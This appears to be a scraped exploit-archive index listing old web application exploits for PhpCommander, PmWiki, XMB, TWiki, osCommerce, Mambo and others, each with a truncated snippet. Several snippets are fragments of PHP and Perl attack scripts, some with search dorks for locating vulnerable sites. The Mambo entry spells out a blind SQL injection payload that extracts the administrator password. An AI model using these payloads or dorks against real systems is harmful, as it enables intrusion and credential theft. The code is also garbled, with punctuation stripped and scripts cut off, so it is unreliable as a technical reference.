PhpCommander 3.0 - 'upload' Remote Code Execution

!/usr/bin/php -q -d shortopentag=on ? $devilteam = " ::::::::: :::::::::: ::: ::: ::::::::::: ::: :+: :+: :+: :+: :+: :+: :+: +:+ +:+ +:+ +:+ +:+ +:+ +:+ ++ +:+ +++:++ ++ +:+ ++ ++ ++ ++ ++ ++ ++ ++ ++ + + + +++ + + ::::::::::: :::::::::: ::: :::: :::: :+: :+: :+: :+: +:+:+: :+:+:+ +:+ +:+ +:+ +:...

PHP-Proxima 6.0 - 'BB_Smilies.php' Local File Inclusion

source: https://www.securityfocus.com/bid/19840/info PHP-Proxima is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit this vulnerability to retrieve arbitrary local files from the vulnerable system in the context of the...

Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit

Exploit for unknown platform in category web applications ================================================================ Tr Forum 2.0 SQL Injection / Bypass Security Restriction Exploit ================================================================ !/usr/bin/perl Affected.scr..: Tr Forum V2.0...

PmWiki <= 2.1.19 (Zend_Hash_Del_Key_Or_Index) Remote Exploit

No description provided by source. !/usr/bin/php -q -d shortopentag=on ? printr' -------------------------------------------------------------------------------- PmWiki = 2.1.19 ZendHashDelKeyOrIndex/remote commands execution exploit by rgod [email protected] site: http://retrogod.altervista.org...

osCommerce 2.1/2.2 - 'product_info.php' SQL Injection

source: https://www.securityfocus.com/bid/19774/info osCommerce is prone to an SQL-injection vulnerability because the application fails to sufficiently sanitize user-supplied data. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent...

MercuryBoard <= 1.1.4 (User-Agent) Remote SQL Injection Exploit

Exploit for unknown platform in category web applications =============================================================== MercuryBoard 4.1 allowing subs not working for me, so I wrote my version vulnerability is actually unpatched... / if $argc3 printr'...

Firewall / Proxy / NAT Dependency

Binary data 3709.prm...

Firewall / Proxy / NAT Dependency

Binary data 3717.prm...

Firewall / Proxy / NAT Dependency

Binary data 3716.prm...

Firewall / Proxy / NAT Dependency

Binary data 3721.prm...

Firewall / Proxy / NAT Dependency

Binary data 3710.prm...

XMB 1.9.6 Final - &#039;basename()&#039; Remote Command Execution

!/usr/bin/php -q -d shortopentag=on ? echo "XMB = 1.9.6 Final basename 'langfilenew' arbitrary local inclusion / remote commands xctn\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: "Powered by XMB"\n\n"; / works regardless of php.ini settings /...

MyBloggie 2.1.4 - trackback.php Multiple SQL Injections

MyBloggie 2.1.4 - trackback.php Multiple SQL Injections !/usr/bin/php -q -d shortopentag=on = 4.1 allowing subs / if $argctrackbackreply1, "Sorry, Trackback failed.. Reason : No title"; if!empty$REQUEST'url' $url=urldecode$REQUEST'url'; if validateurl$url==false $tback-trackbackreply1, "Sorry,...

TWiki 4.0.4 - &#039;configure&#039; Remote Command Execution

!/usr/bin/perl Tue Aug 1 13:18:12 CEST 2006 [email protected] use strict; use LWP::UserAgent; use LWP::Simple; use HTTP::Request; use HTTP::Response; use Getopt::Long; $| = 1; couse 1 is bigger than 0 my $proxy,$proxyuser,$proxypass; my $host,$debug,$dir, $command; my $options = GetOptions 'host=...

Netious CMS &lt;= 0.4 SQL Injection and Session Management Vulnerabilities

-------------------------------------------------------------------------------- -- -- -- Jacek Wlodarczyk j4ck - jacekwloatgmaildotcom -- -- -- -------------------------------------------------------------------------------- --Title: Netious CMS = 0.4 SQL Injection and Session Management...

PatchLink Update Server proxyreg.asp Arbitrary Proxy Manipulation

The remote host is running PatchLink Update Server, a patch and vulnerability management solution. The version of PatchLink Update Server installed on the remote fails to check for authentication credentials before providing access to the '/dagent/proxyreg.asp' script. An attacker can exploit thi...

X7 Chat 2.0.4 - old_prefix Blind SQL Injection

X7 Chat 2.0.4 - oldprefix Blind SQL Injection !/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; i...

ToendaCMS 1.0.0 - &#039;FCKeditor&#039; Arbitrary File Upload

!/usr/bin/php -q -d shortopentag=on 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa.="\r\n"; return $exa."\r\n".$result; $proxyregex =...

papoo3rc3.php.txt

!/usr/bin/php -q -d shortopentag=on ? echo "PAPOO = 3RC3 SQL injection / admin credentials disclosure\n"; echo "by rgod [email protected]\n"; echo "site: http://retrogod.altervista.org\n"; echo "dork: "Help Contact Imprint Sitemap" | "powered by papoo" | "powered by cms papoo"\n\n"; / notes:...

mambo_46rc1_sql.txt

!/usr/bin/php -q -d shortopentag=on mysqld --log=mambo.txt now login, go to "Submit Weblink" feature, in "Name: " field type: 99999' UNION SELECT IF ASCIISUBSTRINGpassword,1,1=0 & 1, benchmark200000000,CHAR0,0 FROM mosusers WHERE usertype='Super Administrator'/ in mambo.txt we have: 13 Query SELE...